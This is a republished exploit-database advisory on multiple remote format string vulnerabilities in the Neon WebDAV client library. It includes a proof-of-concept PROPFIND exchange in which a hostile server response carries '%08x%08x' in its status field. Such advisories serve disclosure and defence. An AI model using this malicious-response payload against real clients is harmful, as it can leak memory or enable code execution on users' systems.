Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Neon Client Library Multiple Remote Format String Vulnerabilities - exploit.company
header-logo
Suggest Exploit
vendor:
Neon client library
by:
Unknown
7.5
CVSS
HIGH
Remote Format String
Unknown
CWE
Product Name: Neon client library
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: No
Related CWE: None provided
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Neon Client Library Multiple Remote Format String Vulnerabilities

The Neon client library is prone to multiple remote format string vulnerabilities. This is due to a failure of the application to properly implement format string functions. An attacker can exploit these vulnerabilities to execute arbitrary code on the affected system, in the security context of the server process.

Mitigation:

It is recommended to update to a patched version of the Neon client library as soon as it becomes available. In the meantime, it is advised to restrict access to the affected software to trusted networks or users.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10136/info 

It has been reported that the Neon client library is prone to multiple remote format string vulnerabilities. This issue is due to a failure of the application to properly implement format string functions.

Ultimately this vulnerability could allow for execution of arbitrary code on the system implementing the affected client software, which would occur in the security context of the server process.

Request
- -------

PROPFIND /example/resource/string/ HTTP/1.1
Pragma: no-cache
Cache-control: no-cache
Accept: text/*, image/jpeg, image/png, image/*, */*
Accept-Encoding: x-gzip, gzip, identity
Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Host: www.example.com
Depth: 0

Response
- --------

HTTP/1.1 207 Multi-Status
X-Cocoon-Version: 2.1
Set-Cookie: JSESSIONID=cookie_data; Path=/example
Content-Type: text/xml
Transfer-Encoding: chunked


<?xml version="1.0" encoding="UTF-8"?>
<D:multistatus xmlns:D="DAV:">

<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>/lenya/blog/authoring/entries/2003/08/24/peanuts/</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype><D:collection/></lp1:resourcetype>
<D:getcontenttype>httpd/unix-directory</D:getcontenttype>
</D:prop>
<D:status>%08x%08x</D:status>
</D:propstat>
</D:response>

</D:multistatus>

Navigation

Suggest Exploit

Services By CQR